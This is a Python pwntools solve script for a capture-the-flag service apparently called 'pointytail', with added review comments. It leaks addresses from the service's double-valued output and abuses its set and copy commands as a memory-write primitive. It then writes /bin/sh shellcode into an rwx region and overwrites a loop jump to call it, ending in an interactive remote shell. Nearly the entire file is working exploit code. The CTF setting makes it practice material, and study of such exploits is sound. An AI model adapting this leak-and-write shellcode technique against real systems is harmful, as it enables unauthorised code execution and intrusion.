from pwn import *
from sys import *
# Target ISA for asm()/shellcraft below: x86-64 (pwntools ContextType.update sets the attribute).
context.update(arch='amd64')
def do2hex(f):
    """Return the unsigned 64-bit integer that shares its bit pattern with the double *f*.

    The float is serialised as a little-endian IEEE-754 double and the same
    8 bytes are read back as a little-endian ``Q``; no numeric conversion
    takes place.
    """
    raw = struct.pack('<d', f)
    (as_int,) = struct.unpack('<Q', raw)
    return as_int
def hex2do(f):
    """Decode the 8 little-endian bytes *f* as an IEEE-754 double.

    Inverse of ``do2hex`` when *f* is ``p64(value)``; ``struct.error`` is
    raised if *f* is not exactly 8 bytes long.
    """
    (value,) = struct.unpack('<d', f)
    return value
# Proof-of-concept solve script for a CTF service (the commented-out line
# below ran a .NET binary, "pointytail.dll", locally instead). The service
# appears to accept one-letter commands followed by two doubles; this script
# reinterprets those doubles as raw 64-bit values via do2hex()/hex2do().
# NOTE(review): the host, port and the two hex offsets are specific to that
# challenge build and have no meaning elsewhere.
HOST = "fun.chall.seetf.sg"
PORT = 50007
#p = process(["dotnet", "pointytail.dll"])
p = remote(HOST,PORT)
# On a remote tube, pidof() resolves the local client-side process — presumably
# kept from the local-debugging setup; harmless against the remote target.
print(util.proc.pidof(p))
# First exchange: after sending 'a', the service prints two doubles after
# "s = "; [1:-2] strips a leading bracket and the trailing ")\n" (assumed
# output format). Their bit patterns are taken as two addresses — the names
# 'leak' and 'stack' are the author's, their roles are inferred.
p.sendline(b'a')
p.recvuntil(b's = ')
res = (p.recvline()[1:-2]).split(b', ')
leak = do2hex(float(res[0]))
stack = do2hex(float(res[1]))
print(hex(leak), hex(stack))
# Addresses are sent back as the text repr of a double. Finite doubles
# round-trip exactly through repr(); NaN payloads would not — assumed not to
# occur. sendline() is given a str here; pwntools encodes it (possibly with a
# warning, depending on the installed version) — verify if the tube rejects it.
arg1 = hex2do(p64(leak-8))
arg2 = hex2do(p64(stack))
p.sendline(f"s {arg1} {arg2}")
p.sendline(b'1')
# Two "c = " markers are skipped on purpose (the second recvuntil); the line
# after the second one carries the value used below.
p.recvuntil(b'c = ')
p.recvuntil(b'c = ')
res = p.recvline()[1:-2].split(b', ')
# 0xe92b0: build-specific distance from the echoed value to what the author
# names an rwx mapping ('rwxp') — TODO confirm against the target binary.
rwxp = do2hex(float(res[0]))-0xe92b0
print("rwxp: ", hex(rwxp))
# The assembled shellcode is cut into len(sc)//6 byte pieces. hex2do() needs
# exactly 8 bytes, so this silently relies on len(sc) being 48 (6 x 8); the
# length is not checked anywhere.
sc = asm(shellcraft.sh())
chunks, chunk_size = len(sc), len(sc)//6
sc = [ sc[i:i+chunk_size] for i in range(0, chunks, chunk_size) ]
print(sc)
target = rwxp
# Second build-specific offset: the location the final loop overwrites
# (per the author's comment there, a jump in a while(1) loop).
target_jmp = rwxp+0x14b95
arg1 = hex2do(p64(target-8))
arg2 = hex2do(p64(stack))
p.sendline(f"s {arg1} {arg2}")
# First 8-byte slot is filled with NOPs; the same 8 bytes are passed as both
# values of the 'c' command (the command appears to take two 8-byte writes).
payload = b'\x90'*8
write1 = hex2do((payload))
write2 = hex2do((payload))
p.sendline(f"c {write1} {write2}")
#Write Shellcode
# Each iteration re-targets with 's' and writes two consecutive 8-byte pieces
# with 'c'; since i steps by 2, target advances in 16-byte steps
# (rwxp+8, rwxp+24, rwxp+40 for 6 pieces). sc[i+1] would raise IndexError
# for an odd piece count — not guarded.
for i in range(0,len(sc),2):
    target = rwxp+((i+1)*8)
    arg1 = hex2do(p64(target))
    arg2 = hex2do(p64(stack))
    p.sendline(f"s {arg1} {arg2}")
    write1 = hex2do(sc[i])
    write2 = hex2do(sc[i+1])
    p.sendline(f"c {write1} {write2}")
# Trampoline: NOP padding + "mov rbx, <rwxp>; call rbx". Assumed to assemble
# to 16 bytes (4 + 10 + 2) so that len(shell)//2 == 8 and both halves fit
# hex2do() — again unchecked.
shell = (asm(f"""
nop
nop
nop
nop
mov rbx, {rwxp}
call rbx
"""
))
chunks, chunk_size = len(shell), len(shell)//2
shell = [ shell[i:i+chunk_size] for i in range(0, chunks, chunk_size) ]
#Overwrite jump while(1) to call rbx
# With two pieces this loop body runs exactly once; target is re-assigned
# from target_jmp each iteration and the write is anchored at target-8.
for i in range(0,len(shell),2):
    target = target_jmp
    arg1 = hex2do(p64(target-8))
    arg2 = hex2do(p64(stack))
    p.sendline(f"s {arg1} {arg2}")
    write1 = hex2do(shell[i])
    write2 = hex2do(shell[i+1])
    p.sendline(f"c {write1} {write2}")
# Hand the connection over to the user.
p.interactive()